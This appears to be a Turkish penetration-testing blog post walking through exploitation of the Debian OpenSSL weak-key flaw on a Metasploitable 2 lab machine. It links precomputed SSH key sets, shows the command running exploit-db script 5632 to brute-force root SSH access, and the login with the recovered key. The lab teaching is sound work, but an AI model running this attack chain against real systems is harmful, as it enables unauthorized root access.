Elde Edilen SSH Özel Anahtarları ile OpenSSL Zafiyeti Olan Linux Bilgisayarlara Komut Satırı Bağlantısının Elde Edilmesi

Sızma testleri sırasında tespit edilen zafiyetlerin istismarı ile hedef sistemlerde bir takım yetkiler elde edilebilir. Bu yazıda Metasploitable 2 işletim sisteminde yüklü olan OpenSSL kütüphanesindeki zafiyet Exploit-db üzerindeki bir betik ve bazı SSH özel anahtarları ile istismar edilecek ve Linux bilgisayarın SSH servisine erişim sağlanacaktır.

Metasploitable 2 üzerindeki OpenSSL sürümü 0.9.8g olduğu görülmektedir.

openssl version

acquiring-command-line-on-metasploitable-2-by-exploiting-openssl-vulnerability-01

 

Bu sürüme ait bir çok zafiyet bulunmaktadır.

acquiring-command-line-on-metasploitable-2-by-exploiting-openssl-vulnerability-02

 

Bunlardan birisi de OpenSSL kütüphanesinin rastgele sayı üreticindeki bir zafiyettir. Bu zafiyet ile zayıf / tahmin edilebilir sayılar üretilmektedir. Zafiyete istismar kodu exploit-db üzerinde bulunabilir.

https://www.exploit-db.com/exploits/5632/

acquiring-command-line-on-metasploitable-2-by-exploiting-openssl-vulnerability-03

 

Ortak kullanılan anahtarlar belirtilen bağlantıdan indirilir.

DSA Anahtarları: http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2
RSA Anahtarları: http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2

 

İndirilen sıkıştırılmış dosyalar dışarıya çıkarılır.

ls -la
ls -la rsa/2048 | more

acquiring-command-line-on-metasploitable-2-by-exploiting-openssl-vulnerability-04

 

İndirilen 5632 ruby betiği kullanılarak 192.168.5.106 IP adresli Metasploitable 2 bilgisayarın SSH servisine root kullanıcısı verilerek SSH özel anahtarları ile kaba kuvvet saldırısı gerçekleştirilir.

ruby ./5632.rb 192.168.5.106 root ./rsa/2048

acquiring-command-line-on-metasploitable-2-by-exploiting-openssl-vulnerability-05

 

SSH özel anahtarı tespit edilmiştir.

cat rsa/2048/57c3115d77c56390332dc5c49978627a-5429

acquiring-command-line-on-metasploitable-2-by-exploiting-openssl-vulnerability-06

 

Tespit edilen SSH özel anahtarı kullanılarak root kullanıcısı ile oturum açılabilir.

ssh root@192.168.5.106 -i 57c3115d77c56390332dc5c49978627a-5429

acquiring-command-line-on-metasploitable-2-by-exploiting-openssl-vulnerability-07

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.